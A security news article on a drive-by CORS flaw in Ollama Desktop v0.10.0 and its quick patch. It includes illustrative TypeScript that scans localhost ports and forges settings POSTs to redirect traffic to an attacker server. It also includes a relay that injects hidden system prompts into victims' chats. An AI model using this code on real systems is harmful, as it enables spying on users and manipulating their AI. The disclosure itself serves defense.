Flawed AI Tool: How a Simple Website Could Have Hijacked Your Ollama App
A vulnerability in the widely used AI deployment tool Ollama exposed users to drive-by attacks: a specially crafted website could surreptitiously tamper with the local application. A successful exploit let attackers read private conversations and even swap the active model for a tainted variant.
The flaw was discovered and disclosed on July 31 by Chris Moberly, Senior Security Manager at GitLab. It affected Ollama Desktop v0.10.0 and stemmed from an improper implementation of CORS controls in the local web service that powers the graphical interface. As a result, JavaScript embedded in a malicious webpage could scan the victim’s machine for open ports in the range 40,000–65,535, identify the random port used by Ollama’s GUI, and issue forged “simple” POST requests (which browsers send without a CORS preflight check) to alter settings and redirect traffic to an attacker-controlled server.
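To make the mechanics concrete, here is a minimal browser-side sketch of the technique described above. It is not Moberly’s published proof of concept: the settings endpoint path and the payload shape are hypothetical placeholders, and a real scan would batch the probes rather than walk the ports one by one.

```typescript
// Hedged illustration of the drive-by pattern: probe localhost ports from a
// malicious page, then fire a CORS "simple" POST that the browser sends
// without a preflight. Endpoint path and payload are hypothetical.

async function portIsOpen(port: number): Promise<boolean> {
  try {
    // With mode "no-cors" the response body is opaque, but the fetch resolves
    // when something is listening and rejects when the connection is refused.
    await fetch(`http://127.0.0.1:${port}/`, {
      mode: "no-cors",
      signal: AbortSignal.timeout(300),
    });
    return true;
  } catch {
    return false;
  }
}

async function findGuiPort(): Promise<number | null> {
  // A real attack would probe ports in parallel batches; sequential for clarity.
  for (let port = 40000; port <= 65535; port++) {
    if (await portIsOpen(port)) return port;
  }
  return null;
}

async function redirectTraffic(port: number, attackerUrl: string): Promise<void> {
  // text/plain keeps this a "simple" request, so no preflight is triggered;
  // the page cannot read the response, but the state-changing side effect lands.
  await fetch(`http://127.0.0.1:${port}/api/settings`, { // hypothetical route
    method: "POST",
    mode: "no-cors",
    headers: { "Content-Type": "text/plain" },
    body: JSON.stringify({ upstream: attackerUrl }),      // hypothetical payload
  });
}
```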
Once the configuration was subverted, the adversary could intercept all local requests, read conversations, and manipulate AI responses in real time, while the victim saw nothing more suspicious than an ordinary website. The attack required no clicks or interaction beyond visiting the page. Worse still, attackers could inject their own system prompts or load “poisoned” models, gaining complete control over the application’s behavior.
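The interception step can be illustrated with a rough sketch of what an attacker-controlled relay might do once the hijacked GUI sends its traffic there: forward each chat request to an Ollama instance on the attacker’s own host while quietly prepending a system message, so the victim still receives plausible answers. The /api/chat request shape follows Ollama’s public API; the relay itself, its port, and the injected text are purely illustrative.

```typescript
// Hedged sketch of a malicious relay (Node 18+): receives the hijacked GUI
// traffic, injects a system prompt into /api/chat calls, and forwards them to
// an Ollama instance on the attacker's host so replies still look normal.
import * as http from "node:http";

const BACKEND = "http://127.0.0.1:11434";            // Ollama on the attacker's host
const INJECTED = { role: "system", content: "...attacker instructions..." };

http.createServer(async (req, res) => {
  const chunks: Buffer[] = [];
  for await (const chunk of req) chunks.push(chunk as Buffer);
  let body = Buffer.concat(chunks).toString();

  if (req.method === "POST" && req.url === "/api/chat" && body) {
    const payload = JSON.parse(body);
    // Prepend a system message that never appears in the victim's UI.
    payload.messages = [INJECTED, ...(payload.messages ?? [])];
    body = JSON.stringify(payload);
  }

  // Relay to the backend and return the (buffered) response unchanged.
  const upstream = await fetch(BACKEND + (req.url ?? "/"), {
    method: req.method,
    headers: { "Content-Type": "application/json" },
    body: req.method === "POST" ? body : undefined,
  });
  res.writeHead(upstream.status, { "Content-Type": "application/json" });
  res.end(await upstream.text());
}).listen(8080);                                      // illustrative port
```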
Moberly remarked that exploitation of the flaw “would have been trivial in real-world conditions,” noting that even the preparation of the attack infrastructure could have been automated using LLMs. Fortunately, the Ollama team acted swiftly: within ninety minutes of disclosure they acknowledged the issue, and just an hour later released v0.10.1, which resolved the bug. For users who installed Ollama via official installers, a simple restart applied the auto-update, while those who installed through Homebrew were required to update manually.
Moberly has published proof-of-concept code and a technical write-up on GitLab. While there is currently no evidence of the vulnerability being exploited in the wild, the researcher strongly urges all Ollama users to confirm that the patch has been applied.
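One quick way to confirm the fix, sketched below, is to query the local API’s version endpoint and check that it reports 0.10.1 or later. The /api/version route and the default port 11434 are part of Ollama’s public API; the helper itself is just an illustration, and running ollama --version or checking the desktop app’s About screen works equally well.

```typescript
// Illustrative check (Node 18+ or any fetch-capable runtime): ask the local
// Ollama API which version it runs and compare it against the patched release.
const PATCHED = [0, 10, 1];

async function isPatched(): Promise<boolean> {
  const res = await fetch("http://127.0.0.1:11434/api/version"); // default Ollama port
  const { version } = (await res.json()) as { version: string };
  const parts = version.split(".").map((p) => parseInt(p, 10));
  // Compare [major, minor, patch] against 0.10.1.
  for (let i = 0; i < 3; i++) {
    if ((parts[i] ?? 0) > PATCHED[i]) return true;
    if ((parts[i] ?? 0) < PATCHED[i]) return false;
  }
  return true; // exactly 0.10.1
}

isPatched().then((ok) =>
  console.log(ok ? "Ollama is on 0.10.1 or later" : "Update Ollama now"),
);
```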
The Ollama project itself is designed to run large language models locally; the new desktop app targets macOS and Windows. The vulnerability did not affect the core Ollama API and was confined to the newly introduced graphical interface, which had been available for only a few weeks before the flaw was uncovered. A CVE identifier has not yet been assigned.